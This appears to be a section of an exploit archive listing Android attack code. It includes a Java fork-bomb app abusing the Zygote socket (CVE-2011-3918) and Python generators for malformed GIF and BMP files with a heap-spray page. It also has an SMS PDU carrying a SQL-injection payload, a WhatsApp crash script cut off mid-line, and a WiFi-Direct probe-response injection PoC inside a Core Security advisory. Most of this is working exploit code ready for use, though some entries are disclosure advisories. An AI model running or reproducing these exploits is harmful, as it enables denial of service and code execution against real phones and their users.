* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.PrintWriter;
import android.app.Service;
import android.content.Intent;
import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.os.HandlerThread;
import android.os.IBinder;
import android.util.Log;
public class ServiceDOS extends Service{
SocketUtil socketUtil = null;
public boolean connectToZygoteIfNeeded(){
int retry = 0;
while(((socketUtil == null) || (socketUtil.sZygoteSocket == null)) && retry < 20)
{
Log.d("SERV", "connection to socket needed");
socketUtil = null;
if (retry > 0) {
try {
Log.d("SERV", "Zygote not up yet, sleeping...");
Thread.sleep(500);
} catch (InterruptedException ex) {
// should never happen
}
}
//loading part..
LocalSocket client = new LocalSocket();
try {
client.connect(new LocalSocketAddress("zygote",LocalSocketAddress.Namespace.RESERVED));
} catch (IOException e1) {
// TODO Auto-generated catch block
Log.e("SERV","link client error");
e1.printStackTrace();
}
if(client != null)
{
DataInputStream in = null;
try {
in = new DataInputStream(client.getInputStream());
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
PrintWriter p = null;
try {
p = new PrintWriter(client.getOutputStream());
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
BufferedWriter out = new BufferedWriter(p);
socketUtil = new SocketUtil(client,in,out);
Log.d("SERV", "socket connection completed");
}
retry++;
} //fine while
if(socketUtil != null)
{
if(retry > 0)
Log.d("SERV", "socket connection completed");
return true;
}
return false;
}
@Override
public void onCreate() {
// Start up the thread running the service. Note that we create a
// separate thread because the service normally runs in the process's
// main thread, which we don't want to block. We also make it
// background priority so CPU-intensive work will not disrupt our UI.
HandlerThread thread = new HandlerThread("ServiceDOS");
thread.start();
connectToZygoteIfNeeded();
}
@Override
public IBinder onBind(Intent intent) {
// TODO Auto-generated method stub
onStartCommand(intent,0,0);
return null;
}
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
Log.d("SERV","onStart");
final int uid = 123456;
final int gid = 123456;
final int[] gids = {};
String[] extraArgs = null; //altrimenti null
String className = "com.android.internal.util.WithFramework";
//String className = "android.app.ActivityThread";
int res = 0;
int tr = 0;
while(tr<10000)
{
//String niceName = "DummyProcess" + tr;
connectToZygoteIfNeeded();
try {
res = socketUtil.startViaZygote(className,null,uid,gid,gids,0,extraArgs);
} catch (Exception e) {
// TODO Auto-generated catch block
Log.e("SERV", "starting error");
e.printStackTrace();
}
//Log.d("SERV", "risultato startViaZygote: " + res);
Log.d("SERV", "started process #:" +tr);
tr++;
}//fine while
//if whe return here -> restart!
return START_STICKY;
}
@Override
public void onDestroy (){
socketUtil.clean();
socketUtil = null;
Log.d("SERV", "service destroyed! trying to restart...");
Intent intent = new Intent(this, ServiceDOS.class);
onStartCommand(intent,0,0);
}
}
################# SocketAndroidActivity.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
public class SocketAndroidActivity extends Activity {
/** Called when the activity is first created. */
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Log.d("APP","starting of the service");
Intent intent = new Intent(this, ServiceDOS.class);
startService(intent);
Log.d("APP","service activated");
this.finish();
}
}
################# SocketUtil.java ##################
/**
* Android Application that performs the fork bomb attack http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3918
*
* Further informations can be found at http://www.ai-lab.it/bugAndroid/bugAndroid.html
*
*
* @author Luca Verderame <luca.verderame@unige.it>
* @version 1.0
*
* Copyright 2012 Luca Verderame
*
* This file is part of ZygoteVulnerability.
ZygoteVulnerability is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
ZygoteVulnerability is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with ZygoteVulnerability. If not, see <http://www.gnu.org/licenses/>.
*
*/
package it.ailab;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.IOException;
import java.util.ArrayList;
import android.net.LocalSocket;
public class SocketUtil {
static LocalSocket sZygoteSocket = null;
static DataInputStream sZygoteInputStream = null;
static BufferedWriter sZygoteWriter = null;
/* versione unixDomainSocket
static UnixDomainSocketClient sZygoteSocket = null;
public SocketUtil(UnixDomainSocketClient c, DataInputStream i,BufferedWriter o)
{
sZygoteSocket = c;
sZygoteInputStream = i;
sZygoteWriter = o;
}
*/
public void clean()
{
try {
sZygoteSocket.close();
sZygoteInputStream.close();
sZygoteWriter.close();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
sZygoteSocket = null;
sZygoteWriter = null;
sZygoteInputStream = null;
}
public SocketUtil(LocalSocket c, DataInputStream i,BufferedWriter o)
{
sZygoteSocket = c;
sZygoteInputStream = i;
sZygoteWriter = o;
}
/*
* Starts a new process via the zygote mechanism.
Parameters:
processClass Class name whose static main() to run
niceName 'nice' process name to appear in ps
uid a POSIX uid that the new process should setuid() to
gid a POSIX gid that the new process shuold setgid() to
gids null-ok; a list of supplementary group IDs that the new process should setgroup() to.
enableDebugger True if debugging should be enabled for this process.
extraArgs Additional arguments to supply to the zygote process.
Returns:
PID
Throws:
Exception if process start failed for any reason
*/
public int startViaZygote(final String processClass,
final String niceName,
final int uid, final int gid,
final int[] gids,
int debugFlags,
String[] extraArgs)
throws Exception {
int pid;
synchronized(Process.class) {
ArrayList<String> argsForZygote = new ArrayList<String>();
// --runtime-init, --setuid=, --setgid=,
// and --setgroups= must go first
argsForZygote.add("--runtime-init");
// argsForZygote.add("--setuid=" + uid);
//argsForZygote.add("--setgid=" + gid);
//argsForZygote.add("--classpath=:data:data:socketAndroid");
//argsForZygote.add("data.data.android.socket.a.socket.DummyClass");
//opzioni da sistemare eventualmente dopo & Zygote.DEBUG_ENABLE_SAFEMODE, & Zygote.DEBUG_ENABLE_DEBUGGER
//& Zygote.DEBUG_ENABLE_CHECKJNI & Zygote.DEBUG_ENABLE_ASSERT
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-safemode");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-debugger");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-checkjni");
}
if ((debugFlags ) != 0) {
argsForZygote.add("--enable-assert");
}
//TODO optionally enable debuger
//argsForZygote.add("--enable-debugger");
/*
// --setgroups is a comma-separated list
if (gids != null && gids.length > 0) {
StringBuilder sb = new StringBuilder();
sb.append("--setgroups=");
int sz = gids.length;
for (int i = 0; i < sz; i++) {
if (i != 0) {
sb.append(',');
}
sb.append(gids[i]);
}
argsForZygote.add(sb.toString());
}
*/
if (niceName != null) {
argsForZygote.add("--nice-name=" + niceName);
}
argsForZygote.add(processClass);
if (extraArgs != null) {
for (String arg : extraArgs) {
argsForZygote.add(arg);
}
}
pid = zygoteSendArgsAndGetPid(argsForZygote);
}
if (pid <= 0) {
throw new Exception("zygote start failed:" + pid);
}
return pid;
}
private static int zygoteSendArgsAndGetPid(ArrayList<String> args)
throws Exception {
int pid = 0;
//openZygoteSocketIfNeeded();
try {
/*See com.android.internal.os.ZygoteInit.readArgumentList()
Presently the wire format to the zygote process is:
a) a count of arguments (argc, in essence)
b) a number of newline-separated argument strings equal to count After the zygote process reads
these it will write the pid of the child or -1 on failure.
*/
sZygoteWriter.write(Integer.toString(args.size()));
sZygoteWriter.newLine();
int sz = args.size();
for (int i = 0; i < sz; i++) {
String arg = args.get(i);
if (arg.indexOf('\n') >= 0) {
throw new Exception(
"embedded newlines not allowed");
}
sZygoteWriter.write(arg);
sZygoteWriter.newLine();
}
sZygoteWriter.flush();
// Should there be a timeout on this?
pid = sZygoteInputStream.readInt();
if (pid < 0) {
throw new Exception("fork() failed");
}
} catch (IOException ex) {
if (sZygoteSocket != null) {
sZygoteSocket.close();
/*
} catch (IOException ex2) {
// we're going to fail anyway
Log.e("app","I/O exception on routine close", ex2);
}
*/
sZygoteSocket = null;
throw new Exception(ex);
}
}
return pid;
}
}

32
exploits/android/dos/31307.py Executable file
View file

@ -0,0 +1,32 @@
source: https://www.securityfocus.com/bid/28005/info
Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
Successfully exploiting this vulnerability can allow remote attackers to execute arbitrary machine code in the context of the application. Failed attempts will likely result in denial-of-service conditions.
This issue affects Android SDK m3-rc37a and earlier.
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('<HH',SWidth,SHeight)+img[10:]
#Save the _bad_ gif image
q=open(imagename,'wb=""')
q.write(img)
q.close()

58
exploits/android/dos/31308.html Normal file
View file

@ -0,0 +1,58 @@
source: https://www.securityfocus.com/bid/28006/info
Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data.
Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
This issue affects Android SDK m5-rc14 and earlier.
# This script generates a Bitmap file that makes the Android browser
jump to the address at 0xffffff+0x10
# Must be loaded inside a HTML file with a tag like this: <IMG
src=badbmp.bmp>
# Alfredo Ortega - Core Security
import struct
offset = 0xffef0000
width = 0x0bffff
height=8
bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00"
bmp+=struct.pack("<I",offset)
bmp+="\x28\x00\x00\x00"
bmp+=struct.pack("<I",width)
bmp+=struct.pack("<I",height)
bmp+="\x03\x00\x08\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
bmp+="\x00\x00\x00\x00\x00\x00\x00\x55\x02\xff\x00\x02\x00\x02\x02\xff"
bmp+="\xff\x11\xff\x33\xff\x55\xff\x66\xff\x77\xff\x88\x41\x41\x41\x41"
bmp+="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
bmp+="\x41\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
bmp+="\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61"
open("badbmp.bmp","wb").write(bmp)
The complete exploit page follows:
<HTML>
<HEAD>
</HEAD>
<BODY>
<script type="text/javascript">
// Fill 0x200000 - 0xa00000 with Breakpoints
var nop = unescape("%u0001%uef9f");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<5;i++)
document.write(nop)
// Fill 0xa00000 - 0x1100000 with address 0x00400040
var nop = unescape("%u4000%u4000");
while (nop.length <= 0x100000/2) nop += nop;
var i = 0;
for (i = 0;i<2;i++)
document.write(nop)
</script>
<IMG src=badbmp.bmp>
</BODY>
</HTML>

143
exploits/android/dos/35382.txt Normal file
View file

@ -0,0 +1,143 @@
INTRODUCTION
==================================
In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check)
DETAILS
==================================
When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java
Here the pdu is parsed to get the contentType & wapAppId:
String mimeType = pduDecoder.getValueString();
...
/**
* Seek for application ID field in WSP header.
* If application ID is found, WapPushManager substitute the message
* processing. Since WapPushManager is optional module, if WapPushManager
* is not found, legacy message processing will be continued.
*/
if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) {
index = (int) pduDecoder.getValue32();
pduDecoder.decodeXWapApplicationId(index);
String wapAppId = pduDecoder.getValueString();
if (wapAppId == null) {
wapAppId = Integer.toString((int) pduDecoder.getValue32());
}
String contentType = ((mimeType == null) ?
Long.toString(binaryContentType) : mimeType);
if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType);
The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console
Type the following command in telnet console:
sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001
And watch the radio logcat message in emulator, it prints out the extracted malicious appid:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!"
But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage:
try {
boolean processFurther = true;
IWapPushManager wapPushMan = mWapPushManager;
if (wapPushMan == null) {
if (DBG) Rlog.w(TAG, "wap push manager not found!");
} else {
Intent intent = new Intent();
intent.putExtra("transactionId", transactionId);
intent.putExtra("pduType", pduType);
intent.putExtra("header", header);
intent.putExtra("data", intentData);
intent.putExtra("contentTypeParameters",
pduDecoder.getContentParameters());
int procRet = wapPushMan.processMessage(wapAppId, contentType, intent);
So we go on checking the source code of WAPPushManager:
https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/
In the method processMessage, the app_id and content_type is used in the method queryLastApp:
public int processMessage(String app_id, String content_type, Intent intent)
throws RemoteException {
Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type);
WapPushManDBHelper dbh = getDatabase(mContext);
SQLiteDatabase db = dbh.getReadableDatabase();
WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type);
db.close();
Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input,
protected queryData queryLastApp(SQLiteDatabase db,
String app_id, String content_type) {
String sql = "select install_order, package_name, class_name, "
+ " app_type, need_signature, further_processing"
+ " from " + APPID_TABLE_NAME
+ " where x_wap_application=\'" + app_id + "\'"
+ " and content_type=\'" + content_type + "\'"
+ " order by install_order desc";
if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql);
Cursor cur = db.rawQuery(sql, null);
Obviously, this is a SQL injection, for example, if app_id is as follows:
' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0--
Then the package_name & class_name of query result would be:
"com.android.settings" and "com.android.settings.Setttings"
OK, then we return back to the method processMessage of WAPPushManager
The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service
That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check)
if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) {
//Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(lastapp.packageName, lastapp.className);
intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
try {
mContext.startActivity(intent);
} catch (ActivityNotFoundException e) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
} else {
intent.setClassName(mContext, lastapp.className);
intent.setComponent(new ComponentName(lastapp.packageName,
lastapp.className));
if (mContext.startService(intent) == null) {
Log.w(LOG_TAG, "invalid name " +
lastapp.packageName + "/" + lastapp.className);
return WapPushManagerParams.INVALID_RECEIVER_NAME;
}
}
This has been fixed in android 5.0 (android bug id 17969135)
https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6
TIMELINE
==================================
11.10.2014 Initial report to Android Security Team with the POC
14.10.2014 Reply from Android Security Team "are looking into it"
04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update
08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners"
09.11.2014 Contact MITRE about this issue
17.11.2014 CVE-2014-8507 assigned
26.11.2014 Public Disclosure
IDENTIFIERS
==================================
CVE-2014-8507
Android id 17969135
CREDITS
==================================
WangTao (neobyte) of Baidu X-Team
WangYu of Baidu X-Team
Zhang Donghui of Baidu X-Team
--
BAIDU X-TEAM (xteam.baidu.com)
An external link of this advisory can be found at http://xteam.baidu.com/?p=167

107
exploits/android/dos/35637.py Executable file
View file

@ -0,0 +1,107 @@
# Mirror: http://pastebin.com/raw.php?i=CZChGAnG
# Video: https://www.youtube.com/watch?v=V7bnLOohqqI
#!/usr/bin/python
#-*- coding: utf-8 -*
# Title: WhatsApp Remote Reboot/Crash App Android
# Product: WhatsApp
# Vendor Homepage: http://www.whatsapp.com
# Vulnerable Version(s): 2.11.476
# Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4
# Date: 26/12/2014
# #RemoteExecution - www.remoteexecution.net
#
# Author Exploit:
# Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com>
# Credits:
# Gonza Cabrera
#
# Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html
#
# Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android.
# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even
# engaging in an interactive conversation over WhatsApp protocol
#
import argparse, sys, os, csv
from Yowsup.Common.utilities import Utilities
from Yowsup.Common.debugger import Debugger
from Yowsup.Common.constants import Constants
from Examples.CmdClient import WhatsappCmdClient
from Examples.EchoClient import WhatsappEchoClient
from Examples.ListenerClient import WhatsappListenerClient
from Yowsup.Registration.v1.coderequest import WACodeRequest
from Yowsup.Registration.v1.regrequest import WARegRequest
from Yowsup.Registration.v1.existsrequest import WAExistsRequest
from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2
from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2
from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2
from Yowsup.Contacts.contacts import WAContactsSyncRequest
import threading,time, base64
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
COUNTRIES_CSV = "countries.csv"
DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth"
######## Yowsup Configuration file #####################
# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n
# phone: Your full phone number including country code, without '+' or '00'
# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup
# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions
# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on
# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials
# or want to register, you can leave this field blank or set it to some random text.
# password: Password to use for login. You obtain this password when you register using Yowsup.
######################################################
MINE_CONFIG ="config"
def getCredentials(config = DEFAULT_CONFIG):
if os.path.isfile(config):
f = open(config)
phone = ""
idx = ""
pw = ""
cc = ""
try:
for l in f:
line = l.strip()
if len(line) and line[0] not in ('#',';'):
prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1)
varname = prep[0].strip()
val = prep[1].strip()
if varname == "phone":
phone = val
elif varname == "id":
idx = val
elif varname =="password":
pw =val
elif varname == "cc":
cc = val
return (cc, phone, idx, pw);
except:
pass
return 0
def main(phone):
credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG )
if credentials:
countryCode, login, identity, password = credentials
identity = Utilities.processIdentity(identity)
password = base64.b64decode(password)
# Custom message that will crash WhatsApp
message = message = "#RemoteExecution

438
exploits/android/dos/35913.txt Normal file
View file

@ -0,0 +1,438 @@
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a Denial of Service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an Unhandle Exception
on WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could be also affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant*[1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below the function that handles *wpa_supplicant* events. This function
returns a jstring from calling NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
devices to exchange device information, the device name is part of
this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi p2p device. The constructor method receives the
string provided by
the *wpa_supplicant* and throws an IllegalArgumentException in case
the event is malformed.
Below partial content of the WiFiP2PDevice.java file.
/-----
[...]
/** Detailed device string pattern with WFD info
* Example:
* P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
p2p_dev_addr=00:18:6b:de:a3:6e
* pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
config_methods=0x188
* dev_capab=0x21 group_capab=0x9
*/
private static final Pattern detailedDevicePattern =
Pattern.compile(
"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"(\\d+ )?" +
"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
"pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
"name='(.*)' " +
"config_methods=(0x[0-9a-fA-F]+) " +
"dev_capab=(0x[0-9a-fA-F]+) " +
"group_capab=(0x[0-9a-fA-F]+)" +
"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
);
[...]
/**
* @param string formats supported include
* P2P-DEVICE-FOUND fa:7b:7a:42:02:13
p2p_dev_addr=fa:7b:7a:42:02:13
* pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
* group_capab=0x0 wfd_dev_info=000006015d022a0032
*
* P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
*
* AP-STA-CONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* AP-STA-DISCONNECTED 42:fc:89:a8:96:09
[p2p_dev_addr=02:90:4c:a0:92:54]
*
* fa:7b:7a:42:02:13
*
* Note: The events formats can be looked up in the
wpa_supplicant code
* @hide
*/
public WifiP2pDevice(String string) throws
IllegalArgumentException {
String[] tokens = string.split("[ \n]");
Matcher match;
if (tokens.length < 1) {
throw new IllegalArgumentException("Malformed supplicant
event");
}
switch (tokens.length) {
case 1:
/* Just a device address */
deviceAddress = string;
return;
case 2:
match = twoTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(2);
return;
case 3:
match = threeTokenPattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(1);
return;
default:
match = detailedDevicePattern.matcher(string);
if (!match.find()) {
throw new IllegalArgumentException("Malformed
supplicant event");
}
deviceAddress = match.group(3);
primaryDeviceType = match.group(4);
deviceName = match.group(5);
wpsConfigMethodsSupported = parseHex(match.group(6));
deviceCapability = parseHex(match.group(7));
groupCapability = parseHex(match.group(8));
if (match.group(9) != null) {
String str = match.group(10);
wfdInfo = new
WifiP2pWfdInfo(parseHex(str.substring(0,4)),
parseHex(str.substring(4,8)),
parseHex(str.substring(8,12)));
}
break;
}
if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
status = AVAILABLE;
}
}
[...]
-----/
On some Android devices when processing a probe response frame with a
WiFi-Direct(P2P)
information element that contains a device name attribute with
specific bytes generates
a malformed supplicant event string that ends up throwing the
IllegalArgumentException.
As this exception is not handled the Android system restarts.
Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS:
WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
E/AndroidRuntime( 2129): at
android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at
android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o
/data/log/dumpstate_sys_error
-----/
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def get_probe_response(source, destination, channel):
frame = str()
frame += "\x50\x00" # Frame Control
frame += "\x00\x00" # Duration
frame += destination
frame += source
frame += source
frame += "\x00\x00" # Sequence Control
frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
frame += "\x64\x00" # Beacon Interval
frame += "\x30\x04" # Capabilities Information
# SSID IE
frame += "\x00"
frame += "\x07"
frame += "DIRECT-"
# Supported Rates
frame += "\x01"
frame += "\x08"
frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
# DS Parameter Set
frame += "\x03"
frame += "\x01"
frame += struct.pack("B", channel)
# P2P
frame += "\xDD"
frame += "\x27"
frame += "\x50\x6F\x9A"
frame += "\x09"
# P2P Capabilities
frame += "\x02" # ID
frame += "\x02\x00" # Length
frame += "\x21\x00"
# P2P Device Info
frame += "\x0D" # ID
frame += "\x1B\x00" # Length
frame += source
frame += "\x01\x88"
frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
frame += "\x00"
frame += "\x10\x11"
frame += "\x00\x06"
frame += "fafa\xFA\xFA"
return frame
def str_to_mac(address):
return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))
if __name__ == "__main__":
if len(sys.argv) != 3:
print "Usage:"
print " poc.py <iface> <target>"
print "Example:"
print " poc.py wlan0 00:11:22:33:44:55"
sys.exit(-1)
iface = sys.argv[1]
destination = str_to_mac(sys.argv[2])
context = PyLorcon2.Context(iface)
context.open_injmon()
channel = 1
source = str_to_mac("00:11:22:33:44:55")
frame = get_probe_response(source, destination, channel)
print "Injecting PoC."
for i in range(100):
context.send_bytes(frame)
time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20rd, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classify the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agrees with the vulnerability
classification and reschedule the publication of the advisory.
. 2014-10-16:
